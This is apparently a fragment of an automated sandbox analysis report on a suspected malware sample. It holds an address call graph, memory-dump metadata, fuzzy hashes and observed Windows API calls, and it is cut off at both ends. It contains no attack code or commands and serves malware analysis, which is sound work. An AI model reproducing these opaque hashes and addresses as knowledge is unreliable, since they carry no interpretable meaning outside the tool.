69602 5bdc530 3 API calls 69601->69602 69603 5bdcb46 69602->69603 69603->69512 69605 5bdb3b3 69604->69605 69606 5bdc530 3 API calls 69605->69606 69607 5bdea9c 69606->69607 69607->69512 69609 5bdb3f3 69608->69609 69610 5bdc530 3 API calls 69609->69610 69611 5bde451 69610->69611 69611->69512 69613 5bdff00 SendMessageW 69612->69613 69614 5bdff6c 69613->69614 69614->69573 69615 5bd5f98 69617 5bd5fac 69615->69617 69616 5bd5fc7 69617->69616 69620 98598c8 69617->69620 69618 5bd6045 69621 98598eb 69620->69621 69622 9859908 69621->69622 69625 989f448 69621->69625 69629 989f444 69621->69629 69622->69618 69626 989f450 69625->69626 69633 9894800 69626->69633 69628 989f4d9 69628->69628 69630 989f448 69629->69630 69631 9894800 DrawTextExW 69630->69631 69632 989f4d9 69631->69632 69632->69632 69634 989480b 69633->69634 69635 98960da 69634->69635 69637 9894820 69634->69637 69635->69628 69638 989482b 69637->69638 69639 989b2c7 69638->69639 69642 989b2e0 69638->69642 69646 989b2dc 69638->69646 69639->69635 69643 989b2e8 69642->69643 69650 989b324 69643->69650 69644 989b30e 69644->69639 69647 989b2e0 69646->69647 69649 989b324 DrawTextExW 69647->69649 69648 989b30e 69648->69639 69649->69648 69651 989b363 69650->69651 69652 989b352 69650->69652 69653 989b3f1 69651->69653 69656 989ba47 69651->69656 69661 989ba50 69651->69661 69652->69644 69653->69644 69657 989ba50 69656->69657 69658 989bb7e 69657->69658 69666 989f818 69657->69666 69671 989f813 69657->69671 69658->69652 69662 989ba58 69661->69662 69663 989bb7e 69662->69663 69664 989f818 DrawTextExW 69662->69664 69665 989f813 DrawTextExW 69662->69665 69663->69652 69664->69663 69665->69663 69667 989f82e 69666->69667 69676 989fc7b 69667->69676 69709 989fc80 69667->69709 69668 989f8a4 69668->69658 69672 989f82e 69671->69672 69674 989fc7b DrawTextExW 69672->69674 69675 989fc80 DrawTextExW 69672->69675 69673 989f8a4 69673->69658 69674->69673 69675->69673 69677 989fc7f 69676->69677 69679 989fc06 69676->69679 69678 989fc9e 69677->69678 69740 
5bd0391 69677->69740 69746 5bd03d9 69677->69746 69752 5bd0395 69677->69752 69758 5bd039d 69677->69758 69764 5bd0399 69677->69764 69770 5bd03a5 69677->69770 69776 5bd03a3 69677->69776 69782 5bd03af 69677->69782 69788 5bd03a9 69677->69788 69794 5bd03b1 69677->69794 69800 5bd0371 69677->69800 69806 5bd03b5 69677->69806 69812 5bd0375 69677->69812 69818 5bd03b9 69677->69818 69824 5bd0379 69677->69824 69830 5bd03bd 69677->69830 69836 5bd037d 69677->69836 69842 5bd0443 69677->69842 69848 5bd0381 69677->69848 69854 5bd03c1 69677->69854 69860 5bd0385 69677->69860 69866 5bd03c5 69677->69866 69872 5bd03c9 69677->69872 69878 5bd0448 69677->69878 69884 5bd03cd 69677->69884 69890 5bd0389 69677->69890 69896 5bd03d1 69677->69896 69902 5bd038d 69677->69902 69908 5bd03d5 69677->69908 69678->69668 69679->69668 69711 5bd03bd DrawTextExW 69709->69711 69712 5bd037d DrawTextExW 69709->69712 69713 5bd03b9 DrawTextExW 69709->69713 69714 5bd0379 DrawTextExW 69709->69714 69715 5bd03b5 DrawTextExW 69709->69715 69716 5bd0375 DrawTextExW 69709->69716 69717 5bd03b1 DrawTextExW 69709->69717 69718 5bd0371 DrawTextExW 69709->69718 69719 5bd03af DrawTextExW 69709->69719 69720 5bd03a9 DrawTextExW 69709->69720 69721 5bd03a5 DrawTextExW 69709->69721 69722 5bd03a3 DrawTextExW 69709->69722 69723 5bd039d DrawTextExW 69709->69723 69724 5bd0399 DrawTextExW 69709->69724 69725 5bd03d9 DrawTextExW 69709->69725 69726 5bd0395 DrawTextExW 69709->69726 69727 5bd03d5 DrawTextExW 69709->69727 69728 5bd0391 DrawTextExW 69709->69728 69729 5bd03d1 DrawTextExW 69709->69729 69730 5bd038d DrawTextExW 69709->69730 69731 5bd03cd DrawTextExW 69709->69731 69732 5bd0389 DrawTextExW 69709->69732 69733 5bd03c9 DrawTextExW 69709->69733 69734 5bd0448 DrawTextExW 69709->69734 69735 5bd0385 DrawTextExW 69709->69735 69736 5bd03c5 DrawTextExW 69709->69736 69737 5bd0381 DrawTextExW 69709->69737 69738 5bd03c1 DrawTextExW 69709->69738 69739 5bd0443 DrawTextExW 69709->69739 69710 989fc9e 69710->69668 69711->69710 69712->69710 69713->69710 
69714->69710 69715->69710 69716->69710 69717->69710 69718->69710 69719->69710 69720->69710 69721->69710 69722->69710 69723->69710 69724->69710 69725->69710 69726->69710 69727->69710 69728->69710 69729->69710 69730->69710 69731->69710 69732->69710 69733->69710 69734->69710 69735->69710 69736->69710 69737->69710 69738->69710 69739->69710 69741 5bd03ce 69740->69741 69742 5bd04a6 69741->69742 69743 5bd04c8 DrawTextExW 69741->69743 69744 5bd04c5 DrawTextExW 69741->69744 69745 5bd05e1 DrawTextExW 69741->69745 69742->69678 69743->69742 69744->69742 69745->69742 69747 5bd03ce 69746->69747 69748 5bd04a6 69747->69748 69749 5bd04c8 DrawTextExW 69747->69749 69750 5bd04c5 DrawTextExW 69747->69750 69751 5bd05e1 DrawTextExW 69747->69751 69748->69678 69749->69748 69750->69748 69751->69748 69753 5bd03ce 69752->69753 69754 5bd04a6 69753->69754 69755 5bd04c8 DrawTextExW 69753->69755 69756 5bd04c5 DrawTextExW 69753->69756 69757 5bd05e1 DrawTextExW 69753->69757 69754->69678 69755->69754 69756->69754 69757->69754 69759 5bd03ce 69758->69759 69760 5bd04a6 69759->69760 69761 5bd04c8 DrawTextExW 69759->69761 69762 5bd04c5 DrawTextExW 69759->69762 69763 5bd05e1 DrawTextExW 69759->69763 69760->69678 69761->69760 69762->69760 69763->69760 69765 5bd03ce 69764->69765 69766 5bd04a6 69765->69766 69767 5bd04c8 DrawTextExW 69765->69767 69768 5bd04c5 DrawTextExW 69765->69768 69769 5bd05e1 DrawTextExW 69765->69769 69766->69678 69767->69766 69768->69766 69769->69766 69771 5bd03ce 69770->69771 69772 5bd04a6 69771->69772 69773 5bd04c8 DrawTextExW 69771->69773 69774 5bd04c5 DrawTextExW 69771->69774 69775 5bd05e1 DrawTextExW 69771->69775 69772->69678 69773->69772 69774->69772 69775->69772 69777 5bd03ce 69776->69777 69778 5bd04a6 69777->69778 69779 5bd04c8 DrawTextExW 69777->69779 69780 5bd04c5 DrawTextExW 69777->69780 69781 5bd05e1 DrawTextExW 69777->69781 69778->69678 69779->69778 69780->69778 69781->69778 69783 5bd03ce 69782->69783 69784 5bd04a6 69783->69784 69785 5bd04c8 DrawTextExW 69783->69785 69786 
5bd04c5 DrawTextExW 69783->69786 69787 5bd05e1 DrawTextExW 69783->69787 69784->69678 69785->69784 69786->69784 69787->69784 69789 5bd03ce 69788->69789 69790 5bd04a6 69789->69790 69791 5bd04c8 DrawTextExW 69789->69791 69792 5bd04c5 DrawTextExW 69789->69792 69793 5bd05e1 DrawTextExW 69789->69793 69790->69678 69791->69790 69792->69790 69793->69790 69795 5bd03ce 69794->69795 69796 5bd04a6 69795->69796 69797 5bd04c8 DrawTextExW 69795->69797 69798 5bd04c5 DrawTextExW 69795->69798 69799 5bd05e1 DrawTextExW 69795->69799 69796->69678 69797->69796 69798->69796 69799->69796 69801 5bd03ce 69800->69801 69802 5bd04a6 69801->69802 69803 5bd04c8 DrawTextExW 69801->69803 69804 5bd04c5 DrawTextExW 69801->69804 69805 5bd05e1 DrawTextExW 69801->69805 69802->69678 69803->69802 69804->69802 69805->69802 69807 5bd03ce 69806->69807 69808 5bd04a6 69807->69808 69809 5bd04c8 DrawTextExW 69807->69809 69810 5bd04c5 DrawTextExW 69807->69810 69811 5bd05e1 DrawTextExW 69807->69811 69808->69678 69809->69808 69810->69808 69811->69808 69813 5bd03ce 69812->69813 69814 5bd04a6 69813->69814 69815 5bd04c8 DrawTextExW 69813->69815 69816 5bd04c5 DrawTextExW 69813->69816 69817 5bd05e1 DrawTextExW 69813->69817 69814->69678 69815->69814 69816->69814 69817->69814 69819 5bd03ce 69818->69819 69820 5bd04a6 69819->69820 69821 5bd04c8 DrawTextExW 69819->69821 69822 5bd04c5 DrawTextExW 69819->69822 69823 5bd05e1 DrawTextExW 69819->69823 69820->69678 69821->69820 69822->69820 69823->69820 69825 5bd03ce 69824->69825 69826 5bd04a6 69825->69826 69827 5bd04c8 DrawTextExW 69825->69827 69828 5bd04c5 DrawTextExW 69825->69828 69829 5bd05e1 DrawTextExW 69825->69829 69826->69678 69827->69826 69828->69826 69829->69826 69831 5bd03ce 69830->69831 69832 5bd04a6 69831->69832 69833 5bd04c8 DrawTextExW 69831->69833 69834 5bd04c5 DrawTextExW 69831->69834 69835 5bd05e1 DrawTextExW 69831->69835 69832->69678 69833->69832 69834->69832 69835->69832 69837 5bd03ce 69836->69837 69838 5bd04a6 69837->69838 69839 5bd04c8 DrawTextExW 

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 75baa17088d94a3ece6fa7f35ea3a1ba1398a164f58fa30c6b429967e2f23b4a
                                                  • Instruction ID: 23018425eeca844e4b5fa1667035669f583605202057a4e31a16614f58ce4e96
                                                  • Opcode Fuzzy Hash: 75baa17088d94a3ece6fa7f35ea3a1ba1398a164f58fa30c6b429967e2f23b4a
                                                  • Instruction Fuzzy Hash: A8A20A30A10705CFC725EF78C854AA9B7B2FF8A305F5189ADD54AAB360DB31A985CF41

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 8352642f65f36a33beb4c2a4c98613effc4f31449f93bcc92705466f7546a769
                                                  • Instruction ID: ef5c9ee10e3938141d450f63673b66f9c3ae41ef26908cdec8f36e0041a7a536
                                                  • Opcode Fuzzy Hash: 8352642f65f36a33beb4c2a4c98613effc4f31449f93bcc92705466f7546a769
                                                  • Instruction Fuzzy Hash: 42A21A30A10705CFC725EF78C854AA9B7B2FF8A305F5189ADD54AAB360DB31A985CF41

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $Huq
                                                  • API String ID: 0-334792489
                                                  • Opcode ID: 1e927957361bb66e22b3c77f36d52617031f7ecac473055c806081d17eea27c5
                                                  • Instruction ID: 0cf34af12d47bc129ad7a181b1b72b2df1bfedbc017082c07b0b9317a7152abd
                                                  • Opcode Fuzzy Hash: 1e927957361bb66e22b3c77f36d52617031f7ecac473055c806081d17eea27c5
                                                  • Instruction Fuzzy Hash: BA718271E00215AFDB14DF79D4845AFBBF6EF88300B15842AE415EB350EB31D905CBA5

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fff?
                                                  • API String ID: 0-4136771917
                                                  • Opcode ID: 973365fd73a03ce86a0c38a4e9a7a0a34a4627b838050ed60aff00dcaefdb274
                                                  • Instruction ID: 43ce6e29a7f9d147f68ebe308bf9050434abcf8a8cd377bfc98d405c5486c714
                                                  • Opcode Fuzzy Hash: 973365fd73a03ce86a0c38a4e9a7a0a34a4627b838050ed60aff00dcaefdb274
                                                  • Instruction Fuzzy Hash: D6621932810A1ADBCF11DF50C884AD9BBB2FF99304F1586D5E9087B125EB71AAD5CF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99d240c8b839f70ae3916e6b0b93592726cd67c8645f2ab43cf2fee0da44d622
                                                  • Instruction ID: 82195afdd907a268b62e44e25e26869a545fb9044cd0000296d852f9b6c4b4c3
                                                  • Opcode Fuzzy Hash: 99d240c8b839f70ae3916e6b0b93592726cd67c8645f2ab43cf2fee0da44d622
                                                  • Instruction Fuzzy Hash: 85523B35910619CFCB25DF64C854AE9BBB5FF89304F2485D9E409AB261EB35EAC2CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d94f909caf62115ef723651f75c416bcfb5abece35cc4e43f73ea7e2304c3ded
                                                  • Instruction ID: e9cdae8c03c9c86ee999ef84656ddd41367745dd1b6f4af4473e7c94c8ec17ac
                                                  • Opcode Fuzzy Hash: d94f909caf62115ef723651f75c416bcfb5abece35cc4e43f73ea7e2304c3ded
                                                  • Instruction Fuzzy Hash: 75321531910619CFCB21DF64C984BD9B7B2FF89304F2585E9E409AB261EB75EA85CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ea454bdd7c27eb3970d21ddd44228b2022fbb573502803ff2b429e585479642
                                                  • Instruction ID: e17e94f1a87d168e0c70bd795b1a84c6e3fabc83581be5a78ff96392482e4ab7
                                                  • Opcode Fuzzy Hash: 8ea454bdd7c27eb3970d21ddd44228b2022fbb573502803ff2b429e585479642
                                                  • Instruction Fuzzy Hash: 01E15D30A00205EFDB14DFA9D988BADBBF2FF84304F568568E405AB265DB70E945DF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe246c1fbb0a68a295ae65f8b29cf76d36976540974ca3ff5f699dc81cb19f86
                                                  • Instruction ID: d726211832e8a0a5b89377a3f4ed84ca9e1f11ee7cb8c77eadc0c9038e750b7f
                                                  • Opcode Fuzzy Hash: fe246c1fbb0a68a295ae65f8b29cf76d36976540974ca3ff5f699dc81cb19f86
                                                  • Instruction Fuzzy Hash: 1CA17E75E003199FCF04DFA4D8449DDBBBAFF99310F148619E81AAB365DB30A985CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68885a435f6d961c2a28f6c786988695e821c152c9181b20c78f27370dabde3f
                                                  • Instruction ID: ebf3728fdf38987dd8987fa74821744e88843a00b07316aa5c84dde6cdc9680a
                                                  • Opcode Fuzzy Hash: 68885a435f6d961c2a28f6c786988695e821c152c9181b20c78f27370dabde3f
                                                  • Instruction Fuzzy Hash: FD919035E0031A9FCF05DFA0D8449DDBBBAFF99310B158219E816AF365EB30A985CB50

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,06D64108,05D99AA8,?,00000000,?,00000000,00000000), ref: 098501F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID: Huq
                                                  • API String ID: 2492992576-93357626
                                                  • Opcode ID: 6b201e4f13d252c37e2dc2e4c119ff600c5720a80fe002d259698bfcef319798
                                                  • Instruction ID: b48bfbe6d46221ca56163c1ed093c136bdbf6edd4f33e003000f3ae135a14eb2
                                                  • Opcode Fuzzy Hash: 6b201e4f13d252c37e2dc2e4c119ff600c5720a80fe002d259698bfcef319798
                                                  • Instruction Fuzzy Hash: 6F515E343006108FDB19EF38C458B2E77A7BFC5B10B1585A9E40ACB3A1CF65EC469BA5

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq$Huq
                                                  • API String ID: 0-820920211
                                                  • Opcode ID: 74dff41531005cd7cd7b445447c621573184c9ddb61410409226e34b3a5b11a7
                                                  • Instruction ID: 48759a4b3a9b6b15612d7f1d02ca89fbfdf1982aa38441dbf2e1addd3b6b89d7
                                                  • Opcode Fuzzy Hash: 74dff41531005cd7cd7b445447c621573184c9ddb61410409226e34b3a5b11a7
                                                  • Instruction Fuzzy Hash: 73814A74E143598FDF04DFA9C8586AEBBF2BF88300F14852AE409EB354DB749905CBA1
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?), ref: 0B3AB245
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 6bcfa8d31db6be55935de682509a09a86a61702e640fdf0259e3a5a299c207b1
                                                  • Instruction ID: 66d5c44ace35d46e034c249b060af0e55e5026d49ea02fb4c1ee4613620281b5
                                                  • Opcode Fuzzy Hash: 6bcfa8d31db6be55935de682509a09a86a61702e640fdf0259e3a5a299c207b1
                                                  • Instruction Fuzzy Hash: BA9159B0A002458FDB14DFA9C984BABBBF5EF88300F258499E815EB252D734E945CB61
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05B4BFB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 696021ab40489d0cadfd8f035e832084e573183dd9eae78fb29999be06c24958
                                                  • Instruction ID: ce68b104ae6b432ef423782c421c7070258003dde00a3e9bef1257ea004e873e
                                                  • Opcode Fuzzy Hash: 696021ab40489d0cadfd8f035e832084e573183dd9eae78fb29999be06c24958
                                                  • Instruction Fuzzy Hash: B1812370A00B458FDB24DF29D444B6ABBF2FF88200F008A6DD28A9BA41D775F945CF91
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?), ref: 0B3AB245
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09852A22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09852A22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 09854F91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05B46D59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05B46D59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B4E326,?,?,?,?,?), ref: 05B4E3E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B4E326,?,?,?,?,?), ref: 05B4E3E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  APIs
                                                  • EnumThreadWindows.USER32(?,00000000,?), ref: 0B3AAEE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: EnumThreadWindows
                                                  • String ID:
                                                  • API String ID: 2941952884-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3A889D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0B3AB3F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID:
                                                  • API String ID: 2030045667-0
                                                  APIs
                                                  • EnumThreadWindows.USER32(?,00000000,?), ref: 0B3AAEE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: EnumThreadWindows
                                                  • String ID:
                                                  • API String ID: 2941952884-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3A889D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0AD12A7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  APIs
                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0B3AB3F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID:
                                                  • API String ID: 2030045667-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05B4C431,00000800,00000000,00000000), ref: 05B4C642
                                                  Memory Dump Source
